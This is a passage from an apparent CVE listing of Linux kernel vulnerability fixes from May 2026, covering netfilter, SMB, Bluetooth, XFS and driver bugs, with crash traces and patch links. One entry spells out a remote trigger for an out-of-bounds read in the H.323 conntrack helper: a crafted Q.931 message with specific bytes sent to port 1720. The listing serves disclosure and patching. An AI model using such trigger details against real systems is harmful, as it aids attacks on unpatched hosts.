https://git.kernel.org/stable/c/a631899025d47ea1aa6464d76db5b4d3b6d196fd https://git.kernel.org/stable/c/ffaf5c99d0f862db021fb1af8b813c1416b1beb2 https://git.kernel.org/stable/c/e1b8c6452ee99a30e188a88f3f3f804fb1c6004a https://git.kernel.org/stable/c/f31a8334e1c54b126fcecf98645a49b6bc5ad399 https://git.kernel.org/stable/c/479b05fc3ee272090f671b06a41f3da8aa78eece https://git.kernel.org/stable/c/6f13c1d2a6271c2e73226864a0e83de2770b6f34 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netfilter: xt_tcpmss: check remaining length before reading optlen Quoting reporter: In net/netfilter/xt_tcpmss.c (lines 53-68), the TCP option parser reads op[i+1] directly without validating the remaining option length. If the last byte of the option field is not EOL/NOP (0/1), the code attempts to index op[i+1]. In the case where i + 1 == optlen, this causes an out-of-bounds read, accessing memory past the optlen boundary (either reading beyond the stack buffer _opt or the following payload). | 2026-05-06 | 8.2 | CVE-2026-43190 | https://git.kernel.org/stable/c/f895191dc32c53eaf443b6443fe40945b2f92287 https://git.kernel.org/stable/c/cd5beda7e0e32865e214f28034bb92c1cecff885 https://git.kernel.org/stable/c/eaedc0bc18be46fe7f58170e967959a932c4f824 https://git.kernel.org/stable/c/07a9b32eaae792ff7d0fcac14d8920c937c0a9c3 https://git.kernel.org/stable/c/8b300f726640c48c3edfe9c453334dd801f4b74e https://git.kernel.org/stable/c/5e13d0a37666955b6cfddc0f73cb40ed645b8a05 https://git.kernel.org/stable/c/f6c412dcfd76b0516d51aa847d8f4c7b70381b09 https://git.kernel.org/stable/c/735ee8582da3d239eb0c7a53adca61b79fb228b3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: cifs: Fix locking usage for tcon fields We used to use the cifs_tcp_ses_lock to protect a lot of objects that are not just the server, ses or tcon lists. We later introduced srv_lock, ses_lock and tc_lock to protect fields within the corresponding structs. This was done to provide a more granular protection and avoid unnecessary serialization. There were still a couple of uses of cifs_tcp_ses_lock to provide tcon fields. In this patch, I've replaced them with tc_lock. | 2026-05-06 | 8.8 | CVE-2026-43215 | https://git.kernel.org/stable/c/953953abb66e52c224057ab91e404284fefeab62 https://git.kernel.org/stable/c/601dd3b79769b38d30b693c40afdb2a4b7edf9d0 https://git.kernel.org/stable/c/3969db6b22e3d90d8c5f22ac1a7fe0350a94c136 https://git.kernel.org/stable/c/8c59eeeeffa1524ef57e173a89a1a3ff539888d5 https://git.kernel.org/stable/c/96c4af418586ee9a6aab61738644366426e05316 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: wan: farsync: Fix use-after-free bugs caused by unfinished tasklets When the FarSync T-series card is being detached, the fst_card_info is deallocated in fst_remove_one(). However, the fst_tx_task or fst_int_task may still be running or pending, leading to use-after-free bugs when the already freed fst_card_info is accessed in fst_process_tx_work_q() or fst_process_int_work_q(). A typical race condition is depicted below: CPU 0 (cleanup) | CPU 1 (tasklet) | fst_start_xmit() fst_remove_one() | tasklet_schedule() unregister_hdlc_device()| | fst_process_tx_work_q() //handler kfree(card) //free | do_bottom_half_tx() | card-> //use The following KASAN trace was captured: ================================================================== BUG: KASAN: slab-use-after-free in do_bottom_half_tx+0xb88/0xd00 Read of size 4 at addr ffff88800aad101c by task ksoftirqd/3/32 ... Call Trace: <IRQ> dump_stack_lvl+0x55/0x70 print_report+0xcb/0x5d0 ? do_bottom_half_tx+0xb88/0xd00 kasan_report+0xb8/0xf0 ? do_bottom_half_tx+0xb88/0xd00 do_bottom_half_tx+0xb88/0xd00 ? _raw_spin_lock_irqsave+0x85/0xe0 ? __pfx__raw_spin_lock_irqsave+0x10/0x10 ? __pfx___hrtimer_run_queues+0x10/0x10 fst_process_tx_work_q+0x67/0x90 tasklet_action_common+0x1fa/0x720 ? hrtimer_interrupt+0x31f/0x780 handle_softirqs+0x176/0x530 __irq_exit_rcu+0xab/0xe0 sysvec_apic_timer_interrupt+0x70/0x80 ... Allocated by task 41 on cpu 3 at 72.330843s: kasan_save_stack+0x24/0x50 kasan_save_track+0x17/0x60 __kasan_kmalloc+0x7f/0x90 fst_add_one+0x1a5/0x1cd0 local_pci_probe+0xdd/0x190 pci_device_probe+0x341/0x480 really_probe+0x1c6/0x6a0 __driver_probe_device+0x248/0x310 driver_probe_device+0x48/0x210 __device_attach_driver+0x160/0x320 bus_for_each_drv+0x101/0x190 __device_attach+0x198/0x3a0 device_initial_probe+0x78/0xa0 pci_bus_add_device+0x81/0xc0 pci_bus_add_devices+0x7e/0x190 enable_slot+0x9b9/0x1130 acpiphp_check_bridge.part.0+0x2e1/0x460 acpiphp_hotplug_notify+0x36c/0x3c0 acpi_device_hotplug+0x203/0xb10 acpi_hotplug_work_fn+0x59/0x80 ... Freed by task 41 on cpu 1 at 75.138639s: kasan_save_stack+0x24/0x50 kasan_save_track+0x17/0x60 kasan_save_free_info+0x3b/0x60 __kasan_slab_free+0x43/0x70 kfree+0x135/0x410 fst_remove_one+0x2ca/0x540 pci_device_remove+0xa6/0x1d0 device_release_driver_internal+0x364/0x530 pci_stop_bus_device+0x105/0x150 pci_stop_and_remove_bus_device+0xd/0x20 disable_slot+0x116/0x260 acpiphp_disable_and_eject_slot+0x4b/0x190 acpiphp_hotplug_notify+0x230/0x3c0 acpi_device_hotplug+0x203/0xb10 acpi_hotplug_work_fn+0x59/0x80 ... The buggy address belongs to the object at ffff88800aad1000 which belongs to the cache kmalloc-1k of size 1024 The buggy address is located 28 bytes inside of freed 1024-byte region The buggy address belongs to the physical page: page: refcount:0 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0xaad0 head: order:3 mapcount:0 entire_mapcount:0 nr_pages_mapped:0 pincount:0 flags: 0x100000000000040(head|node=0|zone=1) page_type: f5(slab) raw: 0100000000000040 ffff888007042dc0 dead000000000122 0000000000000000 raw: 0000000000000000 0000000080100010 00000000f5000000 0000000000000000 head: 0100000000000040 ffff888007042dc0 dead000000000122 0000000000000000 head: 0000000000000000 0000000080100010 00000000f5000000 0000000000000000 head: 0100000000000003 ffffea00002ab401 00000000ffffffff 00000000ffffffff head: 0000000000000000 0000000000000000 00000000ffffffff 0000000000000000 page dumped because: kasan: bad access detected Memory state around the buggy address: ffff88800aad0f00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc ffff88800aad0f80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc >ffff88800aad1000: fa fb ---truncated--- | 2026-05-06 | 8.8 | CVE-2026-43232 | https://git.kernel.org/stable/c/cac048ebfbb92d91d719f74b59177cb70a7633b8 https://git.kernel.org/stable/c/086131807d119238cd464e5b0845e48d938dfd79 https://git.kernel.org/stable/c/ae894e47e1cd5a6bf8a0423d888c45df8b2b02dc https://git.kernel.org/stable/c/337d7b4112a47984ee319171b75b73bab47e7924 https://git.kernel.org/stable/c/200bdb8d367ca9b478f9c56ebe56411604d55c81 https://git.kernel.org/stable/c/21d341fe514fd07e345ed264c9eee21cb2061ca2 https://git.kernel.org/stable/c/04edfdfdfcdefc02408ab670607261b0a0a9a02e https://git.kernel.org/stable/c/bae8a5d2e759da2e0cba33ab2080deee96a09373 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netfilter: nf_conntrack_h323: fix OOB read in decode_choice() In decode_choice(), the boundary check before get_len() uses the variable `len`, which is still 0 from its initialization at the top of the function: unsigned int type, ext, len = 0; ... if (ext || (son->attr & OPEN)) { BYTE_ALIGN(bs); if (nf_h323_error_boundary(bs, len, 0)) /* len is 0 here */ return H323_ERROR_BOUND; len = get_len(bs); /* OOB read */ When the bitstream is exactly consumed (bs->cur == bs->end), the check nf_h323_error_boundary(bs, 0, 0) evaluates to (bs->cur + 0 > bs->end), which is false. The subsequent get_len() call then dereferences *bs->cur++, reading 1 byte past the end of the buffer. If that byte has bit 7 set, get_len() reads a second byte as well. This can be triggered remotely by sending a crafted Q.931 SETUP message with a User-User Information Element containing exactly 2 bytes of PER-encoded data ({0x08, 0x00}) to port 1720 through a firewall with the nf_conntrack_h323 helper active. The decoder fully consumes the PER buffer before reaching this code path, resulting in a 1-2 byte heap-buffer-overflow read confirmed by AddressSanitizer. Fix this by checking for 2 bytes (the maximum that get_len() may read) instead of the uninitialized `len`. This matches the pattern used at every other get_len() call site in the same file, where the caller checks for 2 bytes of available data before calling get_len(). | 2026-05-06 | 8.2 | CVE-2026-43233 | https://git.kernel.org/stable/c/bcb50aa0b8f2b74a9fe5a1c7bee6f2657a288041 https://git.kernel.org/stable/c/2a3aac4205e7d2f1aca2e3827de8cdd517d36c4a https://git.kernel.org/stable/c/81f2fc5b0d0cf4696146f00f837596d10b92dead https://git.kernel.org/stable/c/7ef82863d42261817a6394c6c881bd6757a70f16 https://git.kernel.org/stable/c/53d32735d77ab56cc3fc7bd53a7d099418f19be1 https://git.kernel.org/stable/c/f0a83d0a4b7c127d32ac06d607a9214937716129 https://git.kernel.org/stable/c/35f1943d242e1b9f0b6e91c0c93bfb293a9f8224 https://git.kernel.org/stable/c/baed0d9ba91d4f390da12d5039128ee897253d60 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: smb: client: prevent races in ->query_interfaces() It was possible for two query interface works to be concurrently trying to update the interfaces. Prevent this by checking and updating iface_last_update under iface_lock. | 2026-05-06 | 8.8 | CVE-2026-43239 | https://git.kernel.org/stable/c/93e8e3ee165ae4609a1222b516b573837103d2c3 https://git.kernel.org/stable/c/ab6564f416a6eaf1199200b6100952407b438f7d https://git.kernel.org/stable/c/6287eefaf21ec805d42f941bd368018cf397a7f5 https://git.kernel.org/stable/c/76cc4faba0343c6db945b8dc75425b33d633e1b8 https://git.kernel.org/stable/c/c3c06e42e1527716c54f3ad2ced6a034b5f3a489 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: 9p/xen: protect xen_9pfs_front_free against concurrent calls The xenwatch thread can race with other back-end change notifications and call xen_9pfs_front_free() twice, hitting the observed general protection fault due to a double-free. Guard the teardown path so only one caller can release the front-end state at a time, preventing the crash. This is a fix for the following double-free: [ 27.052347] Oops: general protection fault, probably for non-canonical address 0x6b6b6b6b6b6b6b6b: 0000 [#1] SMP DEBUG_PAGEALLOC NOPTI [ 27.052357] CPU: 0 UID: 0 PID: 32 Comm: xenwatch Not tainted 6.18.0-02087-g51ab33fc0a8b-dirty #60 PREEMPT(none) [ 27.052363] RIP: e030:xen_9pfs_front_free+0x1d/0x150 [ 27.052368] Code: 90 90 90 90 90 90 90 90 90 90 90 90 90 41 55 41 54 55 48 89 fd 48 c7 c7 48 d0 92 85 53 e8 cb cb 05 00 48 8b 45 08 48 8b 55 00 <48> 3b 28 0f 85 f9 28 35 fe 48 3b 6a 08 0f 85 ef 28 35 fe 48 89 42 [ 27.052377] RSP: e02b:ffffc9004016fdd0 EFLAGS: 00010246 [ 27.052381] RAX: 6b6b6b6b6b6b6b6b RBX: ffff88800d66e400 RCX: 0000000000000000 [ 27.052385] RDX: 6b6b6b6b6b6b6b6b RSI: 0000000000000000 RDI: 0000000000000000 [ 27.052389] RBP: ffff88800a887040 R08: 0000000000000000 R09: 0000000000000000 [ 27.052393] R10: 0000000000000000 R11: 0000000000000000 R12: ffff888009e46b68 [ 27.052397] R13: 0000000000000200 R14: 0000000000000000 R15: ffff88800a887040 [ 27.052404] FS: 0000000000000000(0000) GS:ffff88808ca57000(0000) knlGS:0000000000000000 [ 27.052408] CS: e030 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 27.052412] CR2: 00007f9714004360 CR3: 0000000004834000 CR4: 0000000000050660 [ 27.052418] Call Trace: [ 27.052420] <TASK> [ 27.052422] xen_9pfs_front_changed+0x5d5/0x720 [ 27.052426] ? xenbus_otherend_changed+0x72/0x140 [ 27.052430] ? __pfx_xenwatch_thread+0x10/0x10 [ 27.052434] xenwatch_thread+0x94/0x1c0 [ 27.052438] ? __pfx_autoremove_wake_function+0x10/0x10 [ 27.052442] kthread+0xf8/0x240 [ 27.052445] ? __pfx_kthread+0x10/0x10 [ 27.052449] ? __pfx_kthread+0x10/0x10 [ 27.052452] ret_from_fork+0x16b/0x1a0 [ 27.052456] ? __pfx_kthread+0x10/0x10 [ 27.052459] ret_from_fork_asm+0x1a/0x30 [ 27.052463] </TASK> [ 27.052465] Modules linked in: [ 27.052471] ---[ end trace 0000000000000000 ]--- | 2026-05-06 | 8.8 | CVE-2026-43249 | https://git.kernel.org/stable/c/a5d00dff97118a32fcf5fec7a4c3f864c4620c4e https://git.kernel.org/stable/c/59e7707492576bdbfa8c1dbe7d90791df31e4773 https://git.kernel.org/stable/c/bf841d43f7a33d75675ba7f4e214ac1c67913065 https://git.kernel.org/stable/c/ce8ded2e61f47747e31eeefb44dc24a2160a7e32 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mailbox: mchp-ipc-sbi: fix out-of-bounds access in mchp_ipc_get_cluster_aggr_irq() The cluster_cfg array is dynamically allocated to hold per-CPU configuration structures, with its size based on the number of online CPUs. Previously, this array was indexed using hartid, which may be non-contiguous or exceed the bounds of the array, leading to out-of-bounds access. Switch to using cpuid as the index, as it is guaranteed to be within the valid range provided by for_each_online_cpu(). | 2026-05-06 | 8.4 | CVE-2026-43274 | https://git.kernel.org/stable/c/95438699c92947155823dcd3918049a07f3cd867 https://git.kernel.org/stable/c/0442b6229e2eedc95a6d3d18ce75dec7f5b5377c https://git.kernel.org/stable/c/f7c330a8c83c9b0332fd524097eaf3e69148164d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: ethernet: ec_bhf: Fix dma_free_coherent() dma handle dma_free_coherent() in error path takes priv->rx_buf.alloc_len as the dma handle. This would lead to improper unmapping of the buffer. Change the dma handle to priv->rx_buf.alloc_phys. | 2026-05-06 | 8.8 | CVE-2026-43283 | https://git.kernel.org/stable/c/0f589ee54fd6d76d3f75e745f7f12c64cbd749e5 https://git.kernel.org/stable/c/accd0599bc8e73b962247c6c6c70ca7aa1f8e8d0 https://git.kernel.org/stable/c/8320727be7ff704e07c87624efc2a4a75f54b3ce https://git.kernel.org/stable/c/1e300c33ef3cc544c2b9c693778fe9490cfe9184 https://git.kernel.org/stable/c/1b1371cd4032ae859838ebc74215f569987bb197 https://git.kernel.org/stable/c/1b1d3c5d58a80a19d017a409aa2308162bab5bbf https://git.kernel.org/stable/c/7e54ff938bebb173822b4c38b33fc164c1cabf92 https://git.kernel.org/stable/c/ffe68c3766997d82e9ccaf1cdbd47eba269c4aa2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: xfrm: esp: avoid in-place decrypt on shared skb frags MSG_SPLICE_PAGES can attach pages from a pipe directly to an skb. TCP marks such skbs with SKBFL_SHARED_FRAG after skb_splice_from_iter(), so later paths that may modify packet data can first make a private copy. The IPv4/IPv6 datagram append paths did not set this flag when splicing pages into UDP skbs. That leaves an ESP-in-UDP packet made from shared pipe pages looking like an ordinary uncloned nonlinear skb. ESP input then takes the no-COW fast path for uncloned skbs without a frag_list and decrypts in place over data that is not owned privately by the skb. Mark IPv4/IPv6 datagram splice frags with SKBFL_SHARED_FRAG, matching TCP. Also make ESP input fall back to skb_cow_data() when the flag is present, so ESP does not decrypt externally backed frags in place. Private nonlinear skb frags still use the existing fast path. This intentionally does not change ESP output. In esp_output_head(), the path that appends the ESP trailer to existing skb tailroom without calling skb_cow_data() is not reachable for nonlinear skbs: skb_tailroom() returns zero when skb->data_len is nonzero, while ESP tailen is positive. Thus ESP output will either use the separate destination-frag path or fall back to skb_cow_data(). | 2026-05-08 | 8.8 | CVE-2026-43284 | https://git.kernel.org/stable/c/a6cb440f274a22456ef3e86b457344f1678f38f9 https://git.kernel.org/stable/c/ab8b995323e5237041472d07e5055f5f7dcdf15b https://git.kernel.org/stable/c/fe785bb3a8096dffcc4048a85cd0c83337eeecad https://git.kernel.org/stable/c/5d55c7336f8032d434adcc5fab987ccc93a44aec https://git.kernel.org/stable/c/8253aab4659ca16116b522203c2a6b18dccacea7 https://git.kernel.org/stable/c/50ed1e7873100f77abad20fd31c51029bc49cd03 https://git.kernel.org/stable/c/b54edf1e9a3fd3491bdcb82a21f8d21315271e0d https://git.kernel.org/stable/c/71a1d9d985d26716f74d21f18ee8cac821b06e97 https://git.kernel.org/stable/c/52646cbd00e765a6db9c3afe9535f26218276034 https://git.kernel.org/stable/c/f4c50a4034e62ab75f1d5cdd191dd5f9c77fdff4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: nfc: nci: Fix parameter validation for packet data Since commit 9c328f54741b ("net: nfc: nci: Add parameter validation for packet data") communication with nci nfc chips is not working any more. The mentioned commit tries to fix access of uninitialized data, but failed to understand that in some cases the data packet is of variable length and can therefore not be compared to the maximum packet length given by the sizeof(struct). | 2026-05-08 | 8.3 | CVE-2026-43291 | https://git.kernel.org/stable/c/a24a8a582da4426b2042e510a1080df84083b51d https://git.kernel.org/stable/c/f5218426f765eee22e178df9c126d974792fb6a5 https://git.kernel.org/stable/c/ad058a4317db7fdb3f09caa6ed536d24a62ce6a0 https://git.kernel.org/stable/c/3b91160e9a91b5a2662875417dc42dc5b0bf03ea https://git.kernel.org/stable/c/c692db813a7e3b7c3c17d6e9a3ad2a018bf1142b https://git.kernel.org/stable/c/498fc5d0d650c77e87fcc73808d4f43240c21805 https://git.kernel.org/stable/c/571dcbeb8e635182bb825ae758399831805693c2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: hci_sync: Fix UAF in le_read_features_complete This fixes the following backtrace caused by hci_conn being freed before le_read_features_complete but after hci_le_read_remote_features_sync so hci_conn_del -> hci_cmd_sync_dequeue is not able to prevent it: ================================================================== BUG: KASAN: slab-use-after-free in instrument_atomic_read_write include/linux/instrumented.h:96 [inline] BUG: KASAN: slab-use-after-free in atomic_dec_and_test include/linux/atomic/atomic-instrumented.h:1383 [inline] BUG: KASAN: slab-use-after-free in hci_conn_drop include/net/bluetooth/hci_core.h:1688 [inline] BUG: KASAN: slab-use-after-free in le_read_features_complete+0x5b/0x340 net/bluetooth/hci_sync.c:7344 Write of size 4 at addr ffff8880796b0010 by task kworker/u9:0/52 CPU: 0 UID: 0 PID: 52 Comm: kworker/u9:0 Not tainted syzkaller #0 PREEMPT(full) Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/25/2025 Workqueue: hci0 hci_cmd_sync_work Call Trace: <TASK> __dump_stack lib/dump_stack.c:94 [inline] dump_stack_lvl+0x116/0x1f0 lib/dump_stack.c:120 print_address_description mm/kasan/report.c:378 [inline] print_report+0xcd/0x630 mm/kasan/report.c:482 kasan_report+0xe0/0x110 mm/kasan/report.c:595 check_region_inline mm/kasan/generic.c:194 [inline] kasan_check_range+0x100/0x1b0 mm/kasan/generic.c:200 instrument_atomic_read_write include/linux/instrumented.h:96 [inline] atomic_dec_and_test include/linux/atomic/atomic-instrumented.h:1383 [inline] hci_conn_drop include/net/bluetooth/hci_core.h:1688 [inline] le_read_features_complete+0x5b/0x340 net/bluetooth/hci_sync.c:7344 hci_cmd_sync_work+0x1ff/0x430 net/bluetooth/hci_sync.c:334 process_one_work+0x9ba/0x1b20 kernel/workqueue.c:3257 process_scheduled_works kernel/workqueue.c:3340 [inline] worker_thread+0x6c8/0xf10 kernel/workqueue.c:3421 kthread+0x3c5/0x780 kernel/kthread.c:463 ret_from_fork+0x983/0xb10 arch/x86/kernel/process.c:158 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:246 </TASK> Allocated by task 5932: kasan_save_stack+0x33/0x60 mm/kasan/common.c:56 kasan_save_track+0x14/0x30 mm/kasan/common.c:77 poison_kmalloc_redzone mm/kasan/common.c:400 [inline] __kasan_kmalloc+0xaa/0xb0 mm/kasan/common.c:417 kmalloc_noprof include/linux/slab.h:957 [inline] kzalloc_noprof include/linux/slab.h:1094 [inline] __hci_conn_add+0xf8/0x1c70 net/bluetooth/hci_conn.c:963 hci_conn_add_unset+0x76/0x100 net/bluetooth/hci_conn.c:1084 le_conn_complete_evt+0x639/0x1f20 net/bluetooth/hci_event.c:5714 hci_le_enh_conn_complete_evt+0x23d/0x380 net/bluetooth/hci_event.c:5861 hci_le_meta_evt+0x357/0x5e0 net/bluetooth/hci_event.c:7408 hci_event_func net/bluetooth/hci_event.c:7716 [inline] hci_event_packet+0x685/0x11c0 net/bluetooth/hci_event.c:7773 hci_rx_work+0x2c9/0xeb0 net/bluetooth/hci_core.c:4076 process_one_work+0x9ba/0x1b20 kernel/workqueue.c:3257 process_scheduled_works kernel/workqueue.c:3340 [inline] worker_thread+0x6c8/0xf10 kernel/workqueue.c:3421 kthread+0x3c5/0x780 kernel/kthread.c:463 ret_from_fork+0x983/0xb10 arch/x86/kernel/process.c:158 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:246 Freed by task 5932: kasan_save_stack+0x33/0x60 mm/kasan/common.c:56 kasan_save_track+0x14/0x30 mm/kasan/common.c:77 __kasan_save_free_info+0x3b/0x60 mm/kasan/generic.c:587 kasan_save_free_info mm/kasan/kasan.h:406 [inline] poison_slab_object mm/kasan/common.c:252 [inline] __kasan_slab_free+0x5f/0x80 mm/kasan/common.c:284 kasan_slab_free include/linux/kasan.h:234 [inline] slab_free_hook mm/slub.c:2540 [inline] slab_free mm/slub.c:6663 [inline] kfree+0x2f8/0x6e0 mm/slub.c:6871 device_release+0xa4/0x240 drivers/base/core.c:2565 kobject_cleanup lib/kobject.c:689 [inline] kobject_release lib/kobject.c:720 [inline] kref_put include/linux/kref.h:65 [inline] kobject_put+0x1e7/0x590 lib/kobject. ---truncated--- | 2026-05-08 | 8.8 | CVE-2026-43322 | https://git.kernel.org/stable/c/260dc2be643b4a35b27008490c533613e3e53867 https://git.kernel.org/stable/c/035c25007c9e698bef3826070ee34bb6d778020c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: SMP: force responder MITM requirements before building the pairing response smp_cmd_pairing_req() currently builds the pairing response from the initiator auth_req before enforcing the local BT_SECURITY_HIGH requirement. If the initiator omits SMP_AUTH_MITM, the response can also omit it even though the local side still requires MITM. tk_request() then sees an auth value without SMP_AUTH_MITM and may select JUST_CFM, making method selection inconsistent with the pairing policy the responder already enforces. When the local side requires HIGH security, first verify that MITM can be achieved from the IO capabilities and then force SMP_AUTH_MITM in the response in both rsp.auth_req and auth. This keeps the responder auth bits and later method selection aligned. | 2026-05-08 | 8.8 | CVE-2026-43334 | https://git.kernel.org/stable/c/425a22c5373d4e1b46492ab869074ebeeade61f3 https://git.kernel.org/stable/c/7ab69426e7ecbd18a222ee2ec87ca612d30197d7 https://git.kernel.org/stable/c/01bb4045d2306c266178f49ce0c3576d237a3040 https://git.kernel.org/stable/c/91649c02c1baaa18cedf7fb425fa1f0f852c8183 https://git.kernel.org/stable/c/c8ff0ca6508535bccabd81c5c9dcc63de8a3d4fb https://git.kernel.org/stable/c/fa14e0e19820b1bbdb42185c9c4efa950bcffef9 https://git.kernel.org/stable/c/ec17efb1ef91506cfd17a77692eaf4bbacb520ea https://git.kernel.org/stable/c/d05111bfe37bfd8bd4d2dfe6675d6bdeef43f7c7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: smb: client: fix in-place encryption corruption in SMB2_write() SMB2_write() places write payload in iov[1..n] as part of rq_iov. smb3_init_transform_rq() pointer-shares rq_iov, so crypt_message() encrypts iov[1] in-place, replacing the original plaintext with ciphertext. On a replayable error, the retry sends the same iov[1] which now contains ciphertext instead of the original data, resulting in corruption. The corruption is most likely to be observed when connections are unstable, as reconnects trigger write retries that re-send the already-encrypted data. This affects SFU mknod, MF symlinks, etc. On kernels before 6.10 (prior to the netfs conversion), sync writes also used this path and were similarly affected. The async write path wasn't unaffected as it uses rq_iter which gets deep-copied. Fix by moving the write payload into rq_iter via iov_iter_kvec(), so smb3_init_transform_rq() deep-copies it before encryption. | 2026-05-08 | 8.1 | CVE-2026-43362 | https://git.kernel.org/stable/c/438e77435aee2894d5edf90be5c87004a57f6258 https://git.kernel.org/stable/c/52327268224fb9ccc7ecfbbdfdfff54b6e93c518 https://git.kernel.org/stable/c/92e64f1852f455f57d0850989e57c30d7fac7d95 https://git.kernel.org/stable/c/aea5e37388a080361110ab5790f57ae0af383650 https://git.kernel.org/stable/c/d78840a6a38d312dc1a51a65317bb67e46f0b929 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: xfs: fix undersized l_iclog_roundoff values If the superblock doesn't list a log stripe unit, we set the incore log roundoff value to 512. This leads to corrupt logs and unmountable filesystems in generic/617 on a disk with 4k physical sectors... XFS (sda1): Mounting V5 Filesystem ff3121ca-26e6-4b77-b742-aaff9a449e1c XFS (sda1): Torn write (CRC failure) detected at log block 0x318e. Truncating head block from 0x3197. XFS (sda1): failed to locate log tail XFS (sda1): log mount/recovery failed: error -74 XFS (sda1): log mount failed XFS (sda1): Mounting V5 Filesystem ff3121ca-26e6-4b77-b742-aaff9a449e1c XFS (sda1): Ending clean mount ...on the current xfsprogs for-next which has a broken mkfs. xfs_info shows this... meta-data=/dev/sda1 isize=512 agcount=4, agsize=644992 blks = sectsz=4096 attr=2, projid32bit=1 = crc=1 finobt=1, sparse=1, rmapbt=1 = reflink=1 bigtime=1 inobtcount=1 nrext64=1 = exchange=1 metadir=1 data = bsize=4096 blocks=2579968, imaxpct=25 = sunit=0 swidth=0 blks naming =version 2 bsize=4096 ascii-ci=0, ftype=1, parent=1 log =internal log bsize=4096 blocks=16384, version=2 = sectsz=4096 sunit=0 blks, lazy-count=1 realtime =none extsz=4096 blocks=0, rtextents=0 = rgcount=0 rgsize=268435456 extents = zoned=0 start=0 reserved=0 ...observe that the log section has sectsz=4096 sunit=0, which means that the roundoff factor is 512, not 4096 as you'd expect. We should fix mkfs not to generate broken filesystems, but anyone can fuzz the ondisk superblock so we should be more cautious. I think the inadequate logic predates commit a6a65fef5ef8d0, but that's clearly going to require a different backport. | 2026-05-08 | 8.2 | CVE-2026-43365 | https://git.kernel.org/stable/c/5afae524f83d6a18517298491a5624cb0eae5029 https://git.kernel.org/stable/c/2ecda4b83749c1fef0c9dea4fd5e8b513aba3e40 https://git.kernel.org/stable/c/41e91dff2d3974730b5ee50daa8e27ec254cbf91 https://git.kernel.org/stable/c/e88ce9f0536f3b2149afb70625cfc4bd74a4ac6d https://git.kernel.org/stable/c/446a1f5bb64ba38adb93cb043ff0f7b85e8937ca https://git.kernel.org/stable/c/5e7148402dfc4a5b7894d8e97b15e5c2e70924aa https://git.kernel.org/stable/c/52a8a1ba883defbfe3200baa22cf4cd21985d51a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ksmbd: Don't log keys in SMB3 signing and encryption key generation When KSMBD_DEBUG_AUTH logging is enabled, generate_smb3signingkey() and generate_smb3encryptionkey() log the session, signing, encryption, and decryption key bytes. Remove the logs to avoid exposing credentials. | 2026-05-08 | 8.1 | CVE-2026-43377 | https://git.kernel.org/stable/c/4084ed720d7d5f4e975c9e4a6267a552dad3b24a https://git.kernel.org/stable/c/fec5c70b82af3f59f15bb984df94e5ad1fccfb1e https://git.kernel.org/stable/c/3fe2d9ec166b7df9a8df6c0fdcfc210572e27e3f https://git.kernel.org/stable/c/407cc37c21d51f9b9d4d20204b04890880cfa6ae https://git.kernel.org/stable/c/c6b01b997a2094969e315f1ebfc1d64b8ae2163d https://git.kernel.org/stable/c/441336115df26b966575de56daf7107ed474faed |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nsfs: tighten permission checks for handle opening Even privileged services should not necessarily be able to see other privileged service's namespaces so they can't leak information to each other. Use may_see_all_namespaces() helper that centralizes this policy until the nstree adapts. | 2026-05-08 | 8.8 | CVE-2026-43391 | https://git.kernel.org/stable/c/1797ee11451f1b2be69863a9f5bd43b948813fdf https://git.kernel.org/stable/c/d2324a9317f00013facb0ba00b00440e19d2af5e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nsfs: tighten permission checks for ns iteration ioctls Even privileged services should not necessarily be able to see other privileged service's namespaces so they can't leak information to each other. Use may_see_all_namespaces() helper that centralizes this policy until the nstree adapts. | 2026-05-08 | 8.8 | CVE-2026-43403 | https://git.kernel.org/stable/c/3376b345df155ca36d8611857b41ff7d5183fc38 https://git.kernel.org/stable/c/2f3dea284c761c890d676f77d5e55c0c496b4ef4 https://git.kernel.org/stable/c/0ad650e60150eda789deca5e78a6a09d26bf8fc9 https://git.kernel.org/stable/c/e6b899f08066e744f89df16ceb782e06868bd148 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netfilter: x_tables: guard option walkers against 1-byte tail reads When the last byte of options is a non-single-byte option kind, walkers that advance with i += op[i + 1] ? : 1 can read op[i + 1] past the end of the option area. Add an explicit i == optlen - 1 check before dereferencing op[i + 1] in xt_tcpudp and xt_dccp option walkers. | 2026-05-08 | 8.2 | CVE-2026-43452 | https://git.kernel.org/stable/c/c2a445367a496a3c25dbc940c10c8bd1cfd4c14a https://git.kernel.org/stable/c/ae1e1267650638136b84c23f2b31250f0ccb6823 https://git.kernel.org/stable/c/c39f84e4be1be63fc60ca7141ea7b76edcea5907 https://git.kernel.org/stable/c/9b94f0e42ed248eb31929da84ed9f5310d7ff540 https://git.kernel.org/stable/c/5b18b8b35c7cded2d17b2b2604c9b0694ff48d1c https://git.kernel.org/stable/c/bc18551c6169eac5ed813778d3e3e484002dbbe5 https://git.kernel.org/stable/c/d04800323336eebf441d153f43234eac9b833d36 https://git.kernel.org/stable/c/cfe770220ac2dbd3e104c6b45094037455da81d4 |
